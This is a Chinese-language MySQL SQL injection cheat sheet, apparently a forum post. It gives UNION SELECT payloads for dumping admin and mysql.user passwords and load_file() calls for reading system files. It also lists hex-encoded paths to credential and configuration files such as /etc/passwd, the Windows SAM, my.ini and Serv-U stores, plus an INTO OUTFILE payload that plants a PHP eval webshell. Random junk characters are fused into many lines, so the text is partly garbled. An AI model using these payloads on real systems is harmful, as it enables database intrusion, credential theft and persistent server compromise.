Mysql sqlinjection code

admin

Mysql sqlinjection code

# %23 -- /* /**/   注释

UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--
) q  e! j* b  b+ Z9 e7 P
and+(select+count(*)+from+mysql.user)>0--  判断是否能读取MYSQL表
, {6 ~" b& |8 Q% A9 ~/ r
CONCAT_WS(CHAR(32,58,32),user(),database(),version())   用户名 数据库 MYSQL版本
/ M3 G/ o/ {5 ?# E3 L6 A. |
( w' b( R* }: x" s4 _) Punion+select+1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,7--  

) ~% G$ x/ @8 p$ d: T4 d" @, r: dunion all select 1,concat(user,0x3a,pass,0x3a,email) from users/*  获取users表的用户名 密码 email 信息
& l* b0 l- C1 X! }" N/ \
( i+ s2 i) A1 G; \7 U6 hunhex(hex(@@version))    unhex方式查看版本
. ~( _$ p& J3 ]/ [
. D% z7 A6 y- g/ O7 G7 E$ munion all select 1,unhex(hex(@@version)),3/*
. K) M: O5 }) S/ R& T$ U
convert(@@version using latin1) latin 方式查看版本

union+all+select+1,convert(@@version using latin1),3--

CONVERT(user() USING utf8)
union+all+select+1,CONVERT(user() USING utf8),3--  latin方式查看用户名
$ e: B4 s, M7 g" k0 W9 z

and+1=2+union+select+1,passw,3+from+admin+from+mysql.user--   获取MYSQL帐户信息

% n+ K# U% p# ]3 o. m0 xunion+all+select+1,concat(user,0x3a,password),3+from+mysql.user--   获取MYSQL帐户信息

4 q$ E$ s% b7 c6 g" D
! g! I$ j. h! Z* [$ d  B2 f+ t

2 }4 s, o) P% d$ {+ [1 U2 e6 ], V* e- tunion+select+1,concat_ws(0x3a,username,password),3+FROM+ADMIN--  读取admin表 username password 数据  0x3a 为“：” 冒号
9 H# ?8 s& S- }  s  l' ]. ^4 w& b
) g: K. S$ Z& v4 Kunion+all+select+1,concat(username,0x3a,password),3+from+admin--  

4 l7 j6 w& l5 F. |/ R; G( \union+all+select+1,concat(username,char(58),password),3+from admin--
( Z0 }3 f  C5 Z6 Z/ A5 k& I4 P

) r9 y( U' D7 CUNION+SELECT+1,2,3,4,load_file(0x2F6574632F706173737764),6--  通过load_file（）函数读取文件
" Y% Z; S/ u9 W& O+ ?) A! A& U1 r

UNION+SELECT+1,2,3,4,replace(load_file(0x2F6574632F706173737764),0x3c,0x20),6--  通过replace函数将数据完全显示
. Y# E( ^4 u, \7 ^2 T
union+select+1,2,3,char(0x3C3F706870206576616C28245F504F53545B39305D3F3B3E),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'--  在web目录写入一句话木马
! J0 {2 v9 n) l7 S: T0 L. m- b7 D
+ I: u# W4 |! I, b<?php+eval($_POST[90]?;>   为上面16进制编码后的一句话原型
4 s1 s/ g6 b: ?8 N: X$ \1 L

: z  H9 L5 z. D9 t5 `: ^% {union+select+1,2,3,load_file(d:\web\logo123.jpg),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'--   将PHP马改成图片类型上传之网站，再通过into outfile 写入web目录

5 t3 P+ P6 U9 G: |# s1 A
常用查询函数

1:system_user() 系统用户名
4 @- K( H2 ^* [* p( B# A7 H% G6 m2:user()        用户名
3:current_user  当前用户名
: K6 n! z. Z* N1 J7 W4:session_user()连接数据库的用户名
3 h- ?+ W: v  ^, S6 T5:database()    数据库名
6:version()     MYSQL数据库版本  @@version
7:load_file()   MYSQL读取本地文件的函数
& S: H+ r) p9 M9 w9 b! U8@datadir     读取数据库路径
+ u3 J: p" B, ]% W2 i6 }, g9@basedir    MYSQL 安装路径
: A0 `; ]  a" e% w10@version_compile_os   操作系统
$ C) M' S1 j# M% ~9 h; [

& d7 d2 ^  \3 D. q' h: I: CWINDOWS下:
9 z3 l- }# S* s/ {5 y( J9 R0 bc:/boot.ini          //查看系统版本     0x633A2F626F6F742E696E690D0A
7 \8 d# h3 c/ d( P% ?' H" N
c:/windows/php.ini   //php配置信息      0x633A2F77696E646F77732F7068702E696E69
" O( Y9 C3 V* e3 b2 t, D7 Z
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码  0x633A2F77696E646F77732F6D792E696E69

c:/winnt/php.ini      0x633A2F77696E6E742F7068702E696E69

6 E" I% G/ m) t* O: P% t* W3 cc:/winnt/my.ini       0x633A2F77696E6E742F6D792E696E69

% O8 C* W, X( M, P" l: ~6 O& Q: Cc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码  0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944

c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码

0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69

) ]0 f  X4 V2 m% D' ]c:\Program Files\Serv-U\ServUDaemon.ini   0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69

$ d+ t/ _* w. j7 bc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件

c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
. v9 q: s! O& K6 S9 i6 s
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此

5 t9 l* v; y/ |' n2 q$ ac:\Program Files\RhinoSoft.com\ServUDaemon.exe

  H- c' P0 r0 ^* A, uC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif  文件

//存储了pcAnywhere的登陆密码

c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件   
0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66

c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.  0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66
& K" g! s, `) ~7 u; T
$ U# q  L0 }. I6 lc:/Resin/conf/resin.conf  0x633A2F526573696E2F636F6E662F726573696E2E636F6E66


/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机  0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66

d:\APACHE\Apache2\conf\httpd.conf  0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66
- r6 }! M) K  @$ A) G) i
C:\Program Files\mysql\my.ini  0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69
3 ^/ v2 A, n6 d: M3 y, Y- p
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置    0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6C
, @  \5 A/ T  B
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码  0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944
* Q. R: q/ E9 S9 w  f

" \6 [4 V! x& m' VLUNIX/UNIX下:

/etc/passwd  0x2F6574632F706173737764
; G% P! l4 \$ \/ C
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/usr/local/app/php5/lib/php.ini //PHP相关设置   0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69
: `1 n' z8 K; P- }- I6 k
- }8 l) T- f* r/etc/sysconfig/iptables //从中得到防火墙规则策略  0x2F6574632F737973636F6E6669672F69707461626C657320

6 x, ~" o6 r2 r* _/ s) T! K2 x/etc/httpd/conf/httpd.conf // apache配置文件    0x2F6574632F68747470642F636F6E662F68747470642E636F6E66   
5 ?# W+ E7 d! Q6 H- g- z1 F  
/etc/rsyncd.conf //同步程序配置文件              0x2F6574632F7273796E63642E636F6E66
2 D8 F& j9 s+ D- R! B$ V* @# K
/etc/my.cnf //mysql的配置文件   0x2F6574632F6D792E636E66

, K) I$ }  @5 d0 t/etc/redhat-release //系统版本   0x2F6574632F7265646861742D72656C65617365

& Z1 ^3 ?9 C; L! g- z/etc/issue           0x2F6574632F6973737565
. O' q- n/ ^' S% C$ e% c
. u3 Z! I% ?7 C, Y6 C1 O1 v/etc/issue.net       0x2F6574632F69737375652E6E6574

+ {, F9 A9 z& k% n) g" c% D$ w/usr/local/app/php5/lib/php.ini //PHP相关设置  0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/ Q% q4 B( b! X2 a. [+ n* Q/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置   0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
7 S! }3 n) P) G* r
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件  0x2F6574632F68747470642F636F6E662F68747470642E636F6E66

; [6 T! o* i1 u0x2F7573722F6C6F63616C2F61706368652F636F6E662F68747470642E636F6E66

/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看  0x2F7573722F6C6F63616C2F726573696E2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上   0x2F7573722F6C6F63616C2F726573696E2D70726F2D332E302E32322F636F6E662F726573696E2E636F6E66
, w' l& T0 h3 `! l& v/ J' {  E
) m  w' \4 m$ ^# J/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看  

0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66


# a% r* ~7 U% ~: L/etc/sysconfig/iptables 查看防火墙策略 0x2F6574632F737973636F6E6669672F69707461626C6573

7 d  a, S4 F" M9 V5 D7 `! o" ]load_file(char(47))  列出FreeBSD,Sunos系统根目录
3 G% _3 C8 }! ]7 i3 [0 o+ K5 _3 ^
4 b( X# o  T5 x$ T1 O9 u$ P$ u3 q+ D
replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
# ~, d! D( {5 v% h
! U* M7 k& M( K1 s9 ^2 `; ?! }replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
* @# m, m1 L, C6 ~
1 ^; Y- t( c: `8 N+ \上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 "<" 替换成"空格" 返回的是网页.而无法查看到代码.